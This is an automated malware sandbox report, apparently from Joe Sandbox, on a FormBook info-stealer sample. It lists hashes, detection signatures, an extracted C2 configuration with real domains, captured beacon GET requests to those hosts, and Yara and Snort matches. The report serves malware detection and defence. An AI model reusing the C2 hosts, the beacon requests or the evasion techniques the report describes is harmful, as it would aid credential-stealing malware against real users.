Windows Analysis Report vbc.exe

Overview

General Information

Sample Name: vbc.exe
Analysis ID: 518412
MD5: c4a1bdd685e346b7604f93357a922875
SHA1: 6b8fccadcf1977f5850faa1c47617343fafc0ff4
SHA256: 728b23f75c1140a1763dd7c75083f2ae57afeb6ffa3d7b33a9ba1b4904c4566d
Tags: exeXloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.septemberstockevent200.com/ht08/"], "decoy": ["joye.club", "istanbulemlakgalerisi.online", "annikadaniel.love", "oooci.com", "curebase-test.com", "swisstradecenter.com", "hacticum.com", "centercodebase.com", "recbi56ni.com", "mmj0115.xyz", "sharpstead.com", "sprklbeauty.com", "progettogenesi.cloud", "dolinum.com", "amaroqadvisors.com", "traininig.com", "leewaysvcs.com", "nashhomesearch.com", "joy1263.com", "serkanyamac.com", "nursingprogramsforme.com", "huakf.com", "1w3.online", "watermountsteam.top", "tyralruutan.quest", "mattlambert.xyz", "xn--fiqs8sypgfujbl4a.xn--czru2d", "hfgoal.com", "587868.net", "noyoucantridemyonewheel.com", "riewesell.top", "expn.asia", "suplementarsas.com", "item154655544.com", "cdgdentists.com", "deboraverdian.com", "franquiciasexclusivas.tienda", "tminus-10.com", "psychoterapeuta-wroclaw.com", "coachingbywatson.com", "lknitti.net", "belenpison.agency", "facilitetec.com", "99077000.com", "thefitmog.com", "kinmanpowerwashing.com", "escueladelbuenamor.com", "getjoyce.net", "oilelm.com", "maikoufarm.com", "hespresso.net", "timothyschmallrealt.com", "knoxvilleraingutters.com", "roonkingagency.online", "trashwasher.com", "angyfoods.com", "yungbredda.com", "digipoint-entertainment.com", "shangduli.space", "kalaraskincare.com", "ktnsound.xyz", "miabellavita.com", "thenlpmentor.com", "marzhukov.com"]}
Yara detected FormBook
Source: Yara match File source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.joye.club/ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH Avira URL Cloud: Label: phishing
Source: http://www.mattlambert.xyz/ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH Avira URL Cloud: Label: phishing
Antivirus or Machine Learning detection for unpacked file
Source: 8.0.vbc.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.vbc.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.vbc.exe.400000.8.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: vbc.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: vbc.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe
Source: Binary string: help.pdbGCTL source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp
Source: Binary string: help.pdb source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\vbc.exe Code function: 4x nop then pop ebx 8_2_00406ABE
Source: C:\Windows\SysWOW64\help.exe Code function: 4x nop then pop ebx 20_2_02B46ABE

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 44.227.65.245:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 44.227.65.245:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 44.227.65.245:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49816 -> 172.67.188.247:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49816 -> 172.67.188.247:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49816 -> 172.67.188.247:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49821 -> 101.132.116.91:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49821 -> 101.132.116.91:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49821 -> 101.132.116.91:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.miabellavita.com
Source: C:\Windows\explorer.exe Domain query: www.joye.club
Source: C:\Windows\explorer.exe Domain query: www.maikoufarm.com
Source: C:\Windows\explorer.exe Domain query: www.mmj0115.xyz
Source: C:\Windows\explorer.exe Network Connect: 44.227.65.245 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.septemberstockevent200.com
Source: C:\Windows\explorer.exe Domain query: www.watermountsteam.top
Source: C:\Windows\explorer.exe Network Connect: 104.21.4.114 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.yungbredda.com
Source: C:\Windows\explorer.exe Domain query: www.leewaysvcs.com
Source: C:\Windows\explorer.exe Domain query: www.sharpstead.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 118.27.122.222 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 172.67.188.247 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 101.132.116.91 80 Jump to behavior
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.mmj0115.xyz
Source: DNS query: www.mattlambert.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.septemberstockevent200.com/ht08/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nkcbs5VIH8t4m4OlHQ==&IfNL=N8ph5BwH HTTP/1.1Host: www.sharpstead.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH HTTP/1.1Host: www.maikoufarm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=YVcVQnADBOxtkizi8PwpXZC8MGRy3pUK9Tt3i8wwHZUtpCp/3ZP4J1retOso95pi3Qz1GtS4tg==&IfNL=N8ph5BwH HTTP/1.1Host: www.septemberstockevent200.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH HTTP/1.1Host: www.joye.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1Host: www.mmj0115.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1Host: www.mmj0115.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH HTTP/1.1Host: www.miabellavita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=h33IU5xP+CsHIX0jyOd12cEn3mj+DYpLQqBt2JgN37c56kNOSv5/h9LYm8RBo0LsRlylinxRVA==&IfNL=N8ph5BwH HTTP/1.1Host: www.yungbredda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH HTTP/1.1Host: www.mattlambert.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 44.227.65.245 44.227.65.245
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 09 Nov 2021 11:57:34 GMTContent-Type: text/htmlContent-Length: 275ETag: "6182ae77-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 09 Nov 2021 11:57:40 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 74 30 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ht08/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 09 Nov 2021 11:58:02 GMTContent-Type: text/htmlContent-Length: 275ETag: "6182ac26-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 09 Nov 2021 11:58:13 GMTContent-Type: text/htmlContent-Length: 275ETag: "6185407c-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000B.00000000.291685186.0000000006870000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: unknown DNS traffic detected: queries for: www.sharpstead.com
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nkcbs5VIH8t4m4OlHQ==&IfNL=N8ph5BwH HTTP/1.1Host: www.sharpstead.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH HTTP/1.1Host: www.maikoufarm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=YVcVQnADBOxtkizi8PwpXZC8MGRy3pUK9Tt3i8wwHZUtpCp/3ZP4J1retOso95pi3Qz1GtS4tg==&IfNL=N8ph5BwH HTTP/1.1Host: www.septemberstockevent200.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH HTTP/1.1Host: www.joye.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1Host: www.mmj0115.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1Host: www.mmj0115.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH HTTP/1.1Host: www.miabellavita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=h33IU5xP+CsHIX0jyOd12cEn3mj+DYpLQqBt2JgN37c56kNOSv5/h9LYm8RBo0LsRlylinxRVA==&IfNL=N8ph5BwH HTTP/1.1Host: www.yungbredda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH HTTP/1.1Host: www.mattlambert.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: vbc.exe, 00000000.00000002.263973483.0000000000D39000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
